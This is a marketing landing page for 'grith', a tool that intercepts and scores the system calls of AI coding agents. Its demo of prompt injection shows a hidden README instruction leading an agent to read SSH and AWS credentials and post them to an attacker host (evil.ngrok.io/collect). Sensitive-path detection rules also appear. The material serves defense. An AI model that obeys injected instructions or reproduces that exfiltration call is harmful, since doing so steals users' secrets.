Launching Soon

Your AI Agent Has Full Access to Your Machine

Every file read, shell command, and network call — unmonitored. grith intercepts every system call from any AI coding agent and evaluates it against 17 independent security filters before execution. Wrap any CLI tool with grith exec.

grith security proxy
$ grith exec -- claude-code
→ Intercepting system calls...
fs.read("~/.ssh/id_rsa")
├─ path_match: SENSITIVE +4.0
├─ taint_track: EXFIL_RISK +3.5
└─ composite: 7.5 → AUTO-DENY ✕
✓ Threat blocked. Agent continued safely.
Syscall Interception · 17 Security Filters · CLI Supervisor · Model Agnostic · Local-First · Open Source · AGPL v3
0 CVEs in AI-Powered IDEs (IDEsaster Research)
0% Exploitation Rate (IDEsaster Research)
0% Breach Alerts Ignored (Verizon 2024 DBIR)
0+ Exposed Instances (ClawHavoc Attack)
Real Attack Scenario

This Is What Prompt Injection Looks Like in Practice

A malicious README tells your agent to exfiltrate SSH keys. No prompt, no alert — unless grith is watching.

Without grith: Compromised
$ agent "review this repo"
# Agent reads README.md with hidden injection
→ Reading project files...
→ Analysing codebase...
fs.read("~/.ssh/id_rsa")
fs.read("~/.aws/credentials")
net.post("https://evil.ngrok.io/collect",
body: { ssh_key, aws_creds })
⚠ Credentials exfiltrated to attacker server.
No alert was raised. No prompt was shown.
With grith: Protected
$ grith exec -- agent "review this repo"
# Same repo, same hidden injection
→ Reading project files...
→ Analysing codebase...
fs.read("~/.ssh/id_rsa")
├─ path_match: +5.0
├─ taint_track: +3.0
└─ composite: 8.0 → AUTO-DENY ✕
✓ Attack blocked. Logged to audit trail.
Agent continued safely on remaining tasks.
How It Works

Intercept. Score. Decide.

Three-step pipeline, under 15ms. Works with any CLI agent — no modification needed.

1. Intercept

Wrap any CLI tool with grith exec. OS-level syscall interception captures every file open, network connection, and process spawn. No agent modification required.

Works with:
Claude Code, Codex, Aider, Cline, Open Interpreter, Goose — any CLI tool

2. Score

17 independent security filters evaluate each operation in parallel across three phases. Path matching, secret scanning, taint tracking, behavioural profiling, destination reputation — producing a composite score.

Phase 1 <1ms — static checks (6 filters)
Phase 2 ~3ms — pattern matching (5 filters)
Phase 3 ~5ms — context analysis (6 filters)

3. Decide

Composite score routes each call: auto-allow, queue for review, or auto-deny. Ambiguous calls are batched into a quarantine digest — reviewed on your schedule, not one-by-one.

80-90% auto-allowed
5-15% queued for digest review
1-5% auto-denied and logged
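
The Score and Decide steps above, sketched as an added Python example (not grith's code): three hypothetical filters each contribute a weight, the sum is routed against two thresholds, and every decision is appended to an audit list. The filter weights, thresholds, path prefixes and host names are assumptions made for this illustration.

```python
# Added illustration, not grith's code. Filter names echo the page's demo
# output; weights, thresholds, paths and hosts are assumptions.
from dataclasses import dataclass, field

SENSITIVE = ("~/.ssh/", "~/.aws/")        # assumed sensitive path prefixes
KNOWN_HOSTS = {"api.internal.example"}    # constructed destination allowlist
QUEUE_AT, DENY_AT = 3.5, 7.5              # assumed routing thresholds

@dataclass
class Session:
    tainted: bool = False                 # set once a sensitive read is attempted
    audit: list = field(default_factory=list)

def path_match(op, arg, s):
    return 4.0 if op == "fs.read" and arg.startswith(SENSITIVE) else 0.0

def taint_track(op, arg, s):
    # A sensitive read carries exfiltration risk, and so does any outbound
    # request made after the session has touched sensitive paths.
    if op == "fs.read" and arg.startswith(SENSITIVE):
        return 3.5
    return 3.5 if op.startswith("net.") and s.tainted else 0.0

def destination(op, arg, s):
    return 4.0 if op.startswith("net.") and arg not in KNOWN_HOSTS else 0.0

FILTERS = {"path_match": path_match, "taint_track": taint_track,
           "destination": destination}

def evaluate(op, arg, s):
    """Score one intercepted operation and route it: allow, queue or deny."""
    hits = {name: f(op, arg, s) for name, f in FILTERS.items()}
    score = sum(hits.values())
    if score >= DENY_AT:
        decision = "deny"
    elif score >= QUEUE_AT:
        decision = "queue"
    else:
        decision = "allow"
    if hits["path_match"]:
        s.tainted = True                  # conservative: taint on attempt, even if denied
    s.audit.append({"op": op, "arg": arg, "filters": hits,
                    "score": score, "decision": decision})
    return decision, score
```

Because the session stays tainted after the denied key read, a later request to an allowlisted host still lands in the review queue rather than being auto-allowed.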
Developer Experience

What Developers Actually See

After every agent session, a clear summary. No digging through logs.

Session Summary
Session complete — 47 actions │ $1.40 │ 96% allowed
Tool calls: 47            Provider: Anthropic
├─ file_read    22        Model:    Claude Sonnet
├─ file_write   12        Duration: 12m 08s
├─ shell_exec    9        Cost:     $1.40
└─ net_request   4
Security:                 Quality:
├─ Allowed 45 (96%)       ├─ Build  ✓
├─ Queued   2 (4%)        ├─ Tests  ✓
└─ Denied   0             └─ Errors 0
Quarantine Digest
2 items pending review
1. shell_exec("npm install lodash")
Score: 4.2 │ new dependency install
Context: refactoring utils/helpers.ts
[a] approve [d] deny [l] learn
2. net.get("registry.npmjs.org/lodash")
Score: 3.8 │ outbound to new domain
Context: verifying package metadata
[a] approve [d] deny [l] learn
Analytics & Compliance

Analytics, Audit Trails & Compliance — Built In

Every tool call logged. Every decision traceable. From cost tracking to enterprise compliance.

Cost Tracking

Per-session, per-model, per-provider cost breakdowns. Set budgets, get alerts before overruns.

Full Audit Trail

Structured JSON logs for every tool call: what was requested, which filters fired, the composite score, and the decision.

Security Analytics

Decision split visualisation, filter hit rates, anomaly trends, and behavioural baselines over time.

Compliance-Ready Audit Trail

Structured audit data designed to support SOC 2, NIST AI RMF, and HIPAA reporting. Deterministic execution traces auditors can read.

SOC 2 · NIST AI RMF · HIPAA · Enterprise (planned)

SIEM / SOAR Export

Export AI agent security telemetry via webhook and JSON for integration with your existing monitoring stack. Treat AI agent actions like any other security event.

Webhook · JSON · OpenTelemetry (planned) · Enterprise
Teams & Enterprise

Built for Teams. Ready for Enterprise.

From two developers sharing a policy to 500 engineers with SSO, RBAC, and air-gapped deployment (Enterprise, planned).

New

Unified AI Key Management

Add your Claude, OpenAI, OpenRouter, and other API keys to the grith dashboard once. Team members log in to Pro and use any model — no credential sprawl.

New

Approval Channels

Quarantine digest items routed to Slack, Telegram, web dashboard, or email. Approve, deny, or learn from any device.

Pro

Centralised Policy Management

Shared security filter configurations across your team. Update allowlists, scoring thresholds, and path rules from a single dashboard.

Pro

Team Dashboard & Usage Analytics

Per-developer cost, security score, and session history at a glance.

Enterprise

SSO / SAML, RBAC & Air-Gapped Deployment (Planned)

Planned for v2.0: single sign-on via Okta, Azure AD, or any SAML provider. Role-based access controls. Full air-gapped and VPC deployments.

Team Dashboard
API Keys
● Anthropic ···4a7f active
● OpenAI ···9c2e active
● OpenRouter ···1d8b low balance
Team Activity (Today)
sarah │ 3 sessions │ $4.20 │ 98%
james │ 5 sessions │ $8.10 │ 95%
priya │ 2 sessions │ $2.80 │ 91%
Pending Approvals
▸ priya · net.post(ext-api.io) score 5.2
via #security-reviews Slack ✓
Policy
Config: acme-corp-v3.toml
Auto-deny: 8.0
Escalation: #security-reviews
Comparison

No Other Agent Has Native Security Architecture

The only open-source, model-agnostic tool with per-syscall security evaluation.

Capability · grith · Cline · Aider · Open Interp. · Claude Code · Codex
Per-syscall interception · coarse · container
CLI supervisor
Multi-filter scoring
Quarantine digest
Model agnostic
Local-first
Open source
Cost tracking
Analytics & compliance
Unified AI key management
Multi-channel approvals
Coming Soon

Zero Trust Security for Every AI Agent

Per-syscall interception, multi-filter scoring, and quarantine digests — for any CLI agent. Open source. Local-first. Launching soon.

© 2026 grith. All rights reserved.